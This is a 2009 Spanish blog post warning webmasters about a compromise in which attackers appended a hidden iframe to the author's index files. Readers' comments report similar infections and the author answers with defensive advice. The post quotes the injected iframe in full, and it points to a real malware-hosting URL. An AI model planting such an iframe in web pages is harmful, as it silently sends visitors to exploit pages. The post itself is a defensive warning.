Blog de Óscar del Río

1kg de tecnología, 250g de sociedad, economía y otras especias

¡Cuidado! Podrías estar redirigiendo a tus usuarios a sitios Malware

22/08/2009 by Óscar del Río | 8 Comments

wallpaperxl0[1]
Desde anoche hasta esta tarde el blog no funcionaba. Fue debido a que unos atacantes comprometieron la seguridad de mi servidor (parece ser que el ftp) consiguiendo editar con éxito todos y cada uno de los ficheros que contenían la cadena “index” en su nombre (index.php,  index.html, index_extra.php…) en las diferentes carpetas del mismo.

La edición de los ficheros consistió en añadir una línea al final de todos ellos (index.htm, index.php…) con el siguiente código:

<iframe src="http://f5l.at:8080/ts/in.cgi?pepsi154" width=125 height=125 style="visibility: hidden"></iframe>

El objetivo era utilizar mi servidor para hacer un ataque de Frame Injection dirigiendo a los visitantes de mi sitio a la url http://f5l.at:8080/ts/in.cgi?pepsi154, en la que está alojado el exploit dirigido al usuario final, que presumiblemente intentará obtener datos privados del mismo o instalar software malicioso en su equipo.

Me di cuenta “gracias” a que WordPress dejó de funcionar, por lo que la pérdida del servicio que ha sufrido el blog ha sido, más que un problema, un aviso.

Además, este tipo de ataques no solo pueden dañar al visitante de tu sitio sino que pueden hacer que tu dominio acabe en un listado de sitios malware.

Ahora conviene estar alerta, a partir de hoy cada día revisaré si existen ficheros modificados en mi servidor web ya que no me gustaría enviar a mis visitantes a merced de los atacantes.

He buscado información sobre la URL y he visto a otra  persona que le ha sucedido lo mismo:

http://exbb.org/community/topic.php?forum=6&topic=127&postid=1250884659

(Para quienes no entiendan Ruso, entre los que me incluyo ;) , Aquí el link semitraducido por Google)

¿A alguien más le ha pasado?

Comprueba tus ficheros habitualmente, podrías estar redirigiendo sin saberlo a tus usuarios a un sitio Malware

Entradas relacionadas

8 Comments

Leave a reply →

  1. SpamLoco
    24/08/2009 at 4:42 am

    Quién sabe cómo lograron entrar, tal vez algún tema de permisos en las carpetas.

    Lo bueno es que lo detectaste rápido y no le dió tiempo a Google y otros detectar el problema, he visto sitios que terminan penalizados porque el webmaster no detecta a tiempo el ataque.

  2. santiago
    25/08/2009 at 12:30 am

    me paso en unos sitios mios, tambien me entere q paso en sitios conocidos, algunos de hoteles o de vestimenta, hasta ahora, lo unico q veo en comun, es q se uso windows commander para acceder al ftp, y les paso a unos hostings, y no a otros..

    me gustaria saber relamente que hay q hacer para estar al tanto de esto.
    y como evitarlo.

    saludos.

  3. pablo
    25/08/2009 at 4:47 am

    Estimados, yo tambien tube el mismo problema en varios de mis sitios… si encuentran cual fue la vulnerabilidad tengan a bien avisar :-) ya varios de mis sitios fueron catalogados como no confiables por google.

    Saludos

  4. Óscar del Río
    25/08/2009 at 8:27 am

    Si tenéis acceso a crear CronJobs se puede programar una tarea que ejecute un script (por ejemplo en PHP) que sobreescriba cada cierto tiempo los index con las copias de seguridad que tengáis almacenadas.

    Otra opción, también si disponemos de cron, es hacer un script que compruebe regularmente las fechas de modificación de los index, y en caso de cambio avise por email.

    El problema es que en hostings compartidos generalmente no se disponen de estas opciones.

    Si a alguien se le ocurre algo mejor se lo agradezco

  5. fredy marquez
    31/08/2009 at 9:51 pm

    Hola a todos
    Bueno primero que todo felicitar a todos por esta pagina y el foro esta muy interesante este tema en particular.

    Les cuento que tengo el mismo problema en mi pagina web de la empresa
    Constantemente e detectado que el código html de mi INDEX es modificado para agregarle el siguiente redireccionamiento Malware:
    f5l.ru:8080/index.php

    según mi proveedor de hostil el problema es por causa de una vulnerabilidad en el código de mi pagina y en ningun modo dan pie a que el problema es de parte de ellos.

    Espero alguno de ustedes pueda explicarme si es real lo que se me indica o realmente yo puedo como cliete exigir que se vean y reparen todas las vulnerabilidades de mi hostil.

    Espero podamos encontrar una pronta solución a este caso

    Gracias a todos

  6. Óscar del Río
    03/09/2009 at 8:16 am

    Hola Fredy He editado tu comentario para eliminar el enlace a f5l.ru

    Podría ser por tu proveedor, aunque como te dicen también podría ser por alguna vulnerabilidad en tu código o incluso en el cliente con el que accedas a la FTP.

    Te recomiendo hacer lo siguiente:
    1. Cambia la contraseña de tu FTP
    2. Quita los permisos de escritura de aquellos archivos en los que no necesites escribir
    3. Analiza tu PC con antivirus / Antispyware o similares

    Un saludo

  7. fredy marquez
    04/09/2009 at 7:43 pm

    Hola Oscar te cuento que ya efectué los pasos que me recomendaste y ya han pasado 4 días y sin problemas. Espero no tener más malos ratos con los malwares por que realmente son una molestia.

    Muchas gracias y felicidades por tu portal.

    Saludos
    Paz

  8. Cindy Conrad
    23/12/2010 at 9:44 pm

    Quién sabe cómo lograron entrar, tal vez algún tema de permisos en las carpetas. Lo bueno es que lo detectaste rápido y no le dió tiempo a Google y otros detectar el problema, he visto sitios que terminan penalizados porque el webmaster no detecta a tiempo el ataque.

Deja un comentario

Required fields are marked *.